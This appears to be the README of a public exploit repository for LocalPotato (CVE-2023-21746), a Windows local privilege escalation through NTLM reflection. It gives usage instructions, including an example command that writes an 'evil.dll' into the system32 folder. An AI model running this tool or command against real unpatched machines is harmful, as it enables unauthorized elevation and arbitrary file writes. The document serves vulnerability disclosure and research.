/LocalPotato

Windows Privilage Escalation

Primary LanguageC++

LocalPotato

Another Local Windows privilege escalation using a new potato technique ;)

The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.

NOTE: This vulnerability has been fixed by Microsoft in the January 2023 Patch Tuesday with the CVE-2023-21746. If you run this exploit against a patched machine it won't work.

More technical details at --> https://www.localpotato.com/localpotato_html/LocalPotato.html

Usage


         LocalPotato (aka CVE-2023-21746)
         by splinter_code & decoder_it


Mandatory Args:
-i Source file to copy
-o Output file - do not specify the drive letter
Example: localpotato -i c:\hacker\evil.dll -o windows\system32\evil.dll

Optional Args:
-c CLSID (Default {854A20FB-2D44-457D-992F-EF13785D2B51})
-p COM server port (Default 10271)

Demo

image

Authors: